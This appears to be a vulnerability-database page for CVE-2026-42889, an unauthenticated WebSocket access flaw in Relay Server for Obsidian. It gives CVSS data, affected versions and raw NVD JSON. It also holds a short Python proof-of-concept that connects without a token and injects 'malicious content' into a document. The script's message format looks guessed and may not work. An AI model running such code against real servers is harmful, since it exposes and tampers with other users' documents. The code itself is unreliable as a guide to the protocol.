Security Vulnerability Report
中文
CVE-2026-42889 CVSS 9.1 CRITICAL

CVE-2026-42889

Published: 2026-05-12 20:16:42
Last Modified: 2026-05-13 18:21:10
Source: [email protected]

Description

Relay adds real-time collaboration to Obsidian. Relay Server versions 0.9.0 through 0.9.6 contain an authentication bypass in the multi-document WebSocket endpoints. When authentication is configured, WebSocket connections without a token query parameter were incorrectly treated as having full server permissions. An unauthenticated network attacker who knows or guesses a document ID could connect to the document sync WebSocket and read or modify document contents without a valid document token. This vulnerability is fixed in 0.9.7.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Relay Server 0.9.0
Relay Server 0.9.1
Relay Server 0.9.2
Relay Server 0.9.3
Relay Server 0.9.4
Relay Server 0.9.5
Relay Server 0.9.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import asyncio import websockets async def exploit(target_uri, doc_id): # Construct the WebSocket URL without a token # Vulnerability: Server treats connections without token as fully authorized uri = f"{target_uri}/ws/doc/{doc_id}" try: async with websockets.connect(uri) as websocket: print(f"[+] Connected to {uri} without authentication") # Send a malicious message to read or modify document content # Example payload structure depends on Relay Server protocol payload = { "type": "edit", "content": "Malicious content injected by attacker" } await websocket.send(str(payload)) print("[+] Payload sent") # Listen for response (document content) response = await websocket.recv() print(f"[+] Received data: {response}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": # Replace with actual target and guessed document ID target_host = "ws://192.168.1.100:8080" target_doc_id = "example-doc-id-123" asyncio.run(exploit(target_host, target_doc_id))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42889", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:42.143", "lastModified": "2026-05-13T18:21:10.270", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Relay adds real-time collaboration to Obsidian. Relay Server versions 0.9.0 through 0.9.6 contain an authentication bypass in the multi-document WebSocket endpoints. When authentication is configured, WebSocket connections without a token query parameter were incorrectly treated as having full server permissions. An unauthenticated network attacker who knows or guesses a document ID could connect to the document sync WebSocket and read or modify document contents without a valid document token. This vulnerability is fixed in 0.9.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}, {"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/No-Instructions/relay-server/security/advisories/GHSA-9vp9-8q9j-8mqm", "source": "[email protected]"}, {"url": "https://github.com/No-Instructions/relay-server/security/advisories/GHSA-9vp9-8q9j-8mqm", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.